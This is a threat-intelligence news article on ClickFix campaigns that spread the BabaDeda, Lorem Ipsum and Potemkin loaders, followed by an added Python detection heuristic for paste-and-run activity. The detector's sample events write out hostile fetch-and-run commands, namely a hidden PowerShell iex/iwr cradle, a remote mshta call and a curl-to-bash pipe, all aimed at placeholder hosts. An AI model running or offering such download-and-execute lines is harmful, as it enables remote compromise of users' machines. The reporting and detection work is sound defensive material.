Security experts have identified several ClickFix attack campaigns distributing three distinct malware loaders: BabaDeda Loader, Lorem Ipsum Loader, and Potemkin, according to separate findings from Morphisec, BlueVoyant, and Huntress.
BabaDeda Loader attacks, first spotted in April 2026, have primarily targeted organizations in the education and financial sectors.
“Previous BabaDeda operations were recognized for hiding harmful payloads within seemingly legitimate installer packages,” explained Morphisec researcher Shmuel Uzan. “This updated framework retains the same underlying code but evolves it into a much more powerful loader engineered for stealth, evasion, and versatile payload delivery.”
These attacks begin with a ClickFix social engineering trick that manipulates users into executing attacker-provided PowerShell commands. This initial step delivers the loader, which subsequently deploys information stealers and remote access trojans (RATs) using a blend of common techniques such as hidden PowerShell, in-memory shellcode execution, DLL side-loading, and external payload storage.
This malicious activity has been linked to BabaDeda, a crypter service initially identified by Morphisec in November 2021. At that time, it was associated with a campaign targeting the cryptocurrency and Web3 industries to spread information stealers, RATs, and LockBit ransomware.
The loader is built to analyze the host system, avoid execution on Russian or Belarusian machines, and conduct checks for security software before fetching the primary payload and injecting it into a trusted Windows process like “svchost.exe.”
One type of malware distributed through BabaDeda Loader is a .NET backdoor and information stealer capable of gathering sensitive data and creating an encrypted connection to a command-and-control (C2) server. This malware offers a broad set of capabilities, including –
- Gathering comprehensive system details
- Identifying installed browser profiles
- Retrieving browser data such as cookies, browsing history, saved login credentials, user preferences, and local-state encryption keys
- Navigating directories and picking files according to predefined rules
- Reading and stealing file contents
- Taking screenshots and showing information
- Running shell commands or external programs and collecting their output
- Sending stolen data back to the C2 server
- Utilizing native Windows APIs for process interaction, memory management, DPAPI access, Restart Manager functions, and advanced file operations
A second attack sequence involves dropping a ZIP file that uses DLL side-loading to activate DanaBot and SectopRAT (also known as ArechClient). A key feature of these attacks is the use of a multi-stage loader component called Storage Crypter, which retrieves payload data from external storage-like files such as “List.Control.dat.”

“The visible application package looks genuine, while malicious payloads stay concealed within externally stored containers and are only decoded just before execution,” Morphisec noted. “This approach reduces forensic traces, complicates automated analysis, and limits the ability of traditional security solutions to detect malicious activity before it runs.”
These findings highlight the ongoing evolution of modern loader frameworks, which are becoming increasingly modular. They now separate delivery, storage, execution, and payload deployment into distinct components instead of relying on a single, all-in-one program.
ClickFix Chain Delivers Lorem Ipsum Loader
The ClickFix method has also been seen in an ongoing campaign leveraging at least five compromised WordPress sites as entry points to distribute a new loader and backdoor named Lorem Ipsum Loader. The affected websites cover various industries, including architecture, legal services, and construction technology.
This campaign represents a shift from earlier opportunistic attacks that used tampered Microsoft Teams installers distributed through fake download sites promoted via SEO poisoning and malvertising. The loader is believed to have been active since February 2026.
“The move to ClickFix lures hosted on compromised WordPress (WP) sites greatly expands the range of potential victims and shows the attackers’ ability to quickly adjust their initial access methods,” stated BlueVoyant researchers Thomas Elkins and Joshua Green.
This shift in delivery tactics is attributed to Microsoft’s recent takedown of Fox Tempest (also known as Forging Marauder), a threat actor that offered a malware-signing-as-a-service (MSaaS). This service allowed attackers to distribute malware without triggering alerts by using fraudulently obtained Microsoft Trusted Signing certificates.

“Losing access to these certificates made the previous signed-installer delivery model unusable, compelling the operators to switch to a method that completely bypasses the need for code signing,” the researchers added.
This threat cluster is a recent example of how cybercriminals can swiftly recover and switch to alternative delivery methods, even as security teams and law enforcement work to dismantle their operations.
The Lorem Ipsum ecosystem has been confidently linked to a financially driven threat group called Vanilla Tempest (also known as Rapid Brigantine, Vice Society, and Vice Spider). This group is notorious for deploying ransomware families such as Rhysida, BlackCat, Zeppelin, and Quantum Locker.
Attack sequences involving Lorem Ipsum Loader use ClickFix-style lures disguised as Edge browser security updates. Victims are tricked into running a malicious command that downloads a ZIP file along with an outdated 2017 version of Node.js (version 7.10.1). This older Node.js version is used to run JavaScript-based payloads contained in the archive, helping the malware evade detection.
The JavaScript payload acts as a dropper, installing and running additional malware on the infected system. This includes a batch script that establishes persistence by initiating a DLL side-loading chain. This chain executes a malicious DLL (“mscoree.dll” or “msvcp140.dll”), which then decodes the embedded Lorem Ipsum Loader payload.
“The Lorem Ipsum Loader is built to fetch the next-stage Lorem Ipsum Backdoor from C2 infrastructure details stored on attacker-controlled profiles hosted on social media platforms,” BlueVoyant explained. They added that the backdoor includes features to execute further payloads received from the C2 server.
“The Lorem Ipsum chain ultimately hands off to Rapid Brigantine’s well-known post-exploitation tools and finally to their documented ransomware.”
Potemkin, RMMProject, and EtherRAT Deployed via ClickFix
A third ClickFix-driven campaign leverages a multi-stage attack sequence: it first installs an MSI package, which then delivers an HTML Application (HTA) payload that drops a previously unknown loader named Potemkin. This loader acts as a gateway to deploy EtherRAT and RMMProject—a Lua-scriptable DLL equipped with modules for remote screen hijacking and stealing browser credentials by bypassing Chromium’s App-Bound Encryption (ABE) defenses.
RMMProject also features a task scheduler capable of launching files or processes, capturing screenshots, harvesting browser autofill data, executing arbitrary Lua scripts, killing browser processes, and downloading and running additional modules from a remote URL on the fly.

The Potemkin loader is described as a “purpose-built x64 loader that relies on a domain generation algorithm to locate its command-and-control server and reflectively loads subsequent modules directly into memory,” according to Huntress researchers Anna Pham and Zach Rogers. The security firm flagged this activity last month.
The loader contains several dedicated components that collectively manage its operational lifecycle, including DGA-based C2 discovery powered by a built-in dictionary of 1,000 words, victim identification through a unique UUID value stored at “%LOCALAPPDATA%\hyper-v.ver,” task polling, DLL fetching and execution, and a custom byte-level cipher to encrypt both C2 traffic and the DGA dictionary.
Once foothold access is secured, the unidentified threat actor is observed performing interactive operator-driven actions—configuring Microsoft Defender exclusions, spinning up Chisel reverse SOCKS tunnelling, carrying out further reconnaissance, establishing a Cloudflare tunnel for persistence, and moving laterally through the environment via WMIExec and SMBExec to reach the domain controller and spread EtherRAT to more than 11 hosts.
ClickFix Persists as a Potent Attack Vector
These findings arrive amid ClickFix’s ongoing evolution as a highly effective technique for targeting both Windows and macOS users through deceptive bot-check screens that serve up malicious payloads such as Phexia Stealer—a macOS-focused information stealer—and HellsUlcker, a backdoor delivered through EtherHiding that can pull files from a C2 server, execute them, and report outcomes back to the attacker.
Seizing on surging public curiosity around artificial intelligence (AI) tools, ClickFix campaigns have also circulated counterfeit MSI installers disguised as packages for Claude to silently trigger PowerShell-based payloads.
“ClickFix works because it preys on basic human instinct,” Huntress researchers noted. “When presented with a confident, authoritative step-by-step instruction—‘press Win+R, paste this text, hit Enter’—users tend to comply without hesitation. The social engineering behind it doesn’t need to be elaborate; it simply resembles a routine system fix, and that alone is frequently sufficient.”
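The paste-and-run pattern described above (an interpreter spawned straight from Win+R or a terminal with a hidden window, a download cradle and in-memory execution) can be triaged from process-creation telemetry. The following detection heuristic is an added example, not code from the article or from any of the vendors cited; the indicator regexes, weights and the sample events (documentation-range IPs) are constructed for illustration.

```python
import re

# Heuristics for the ClickFix pattern: the desktop shell (explorer.exe / Terminal)
# launches an interpreter whose command line carries a hidden window, a download
# cradle, an encoded or remotely fetched payload, and inline execution.
INTERACTIVE_PARENTS = {"explorer.exe", "terminal", "iterm2"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "bash", "zsh", "sh"}

# Each indicator carries a weight; remote HTA and encoded commands are strong on their own.
INDICATORS = {
    "hidden_window":   (1, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    "policy_bypass":   (1, re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I)),
    "download_cradle": (1, re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b", re.I)),
    "inline_exec":     (1, re.compile(r"\b(?:iex|invoke-expression)\b|\|\s*(?:ba|z)?sh\b", re.I)),
    "encoded_command": (2, re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    "remote_hta":      (2, re.compile(r"mshta(?:\.exe)?\s+https?://", re.I)),
}
THRESHOLD = 2

def score_event(parent_image, image, command_line):
    """Return {'flagged', 'score', 'indicators'} for one process-creation event."""
    parent = parent_image.rsplit("\\", 1)[-1].rsplit("/", 1)[-1].lower()
    child = image.rsplit("\\", 1)[-1].rsplit("/", 1)[-1].lower()
    hits = [name for name, (_, rx) in INDICATORS.items() if rx.search(command_line)]
    score = sum(INDICATORS[name][0] for name in hits)
    # Only an interpreter launched directly from the interactive shell fits the paste-and-run pattern.
    flagged = parent in INTERACTIVE_PARENTS and child in INTERPRETERS and score >= THRESHOLD
    return {"flagged": flagged, "score": score, "indicators": hits}

# Constructed sample events (parent image, image, command line); none are real indicators.
SAMPLE_EVENTS = [
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -w hidden -ep bypass -c \"iex (iwr 'http://203.0.113.10/verify.txt' -UseBasicParsing)\""),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe", "mshta https://198.51.100.7/check.hta"),
    ("/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "/bin/bash",
     "bash -c \"curl -fsSL http://203.0.113.22/fix.sh | bash\""),
    (r"C:\Windows\System32\services.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"),  # scheduled admin script: benign
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
]

def triage(events=SAMPLE_EVENTS):
    """Return the command lines of the events that match the ClickFix pattern."""
    return [cmd for parent, image, cmd in events if score_event(parent, image, cmd)["flagged"]]

if __name__ == "__main__":
    for cmd in triage():
        print("ClickFix-like:", cmd)
```

The parent-process condition matters as much as the command-line indicators: the same download cradle launched by a scheduler or management agent is a different (and often legitimate) story, so it is scored but not flagged.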
The inherent danger of blindly pasting website-sourced commands into Terminal (whether prompted by a web page, chatbot, email, or messaging platform) has motivated Apple to roll out a new safety prompt in macOS Tahoe 26.4. This pop-up intercepts Mac users mid-action when they attempt to run unverified commands from external sources.
“Scammers exploit these platforms by telling users to paste harmful commands into Terminal, compromising your Mac or stealing your private information,” Apple explained in a newly released support article. “This alert is designed to help ensure you don’t accidentally run something you never intended to.”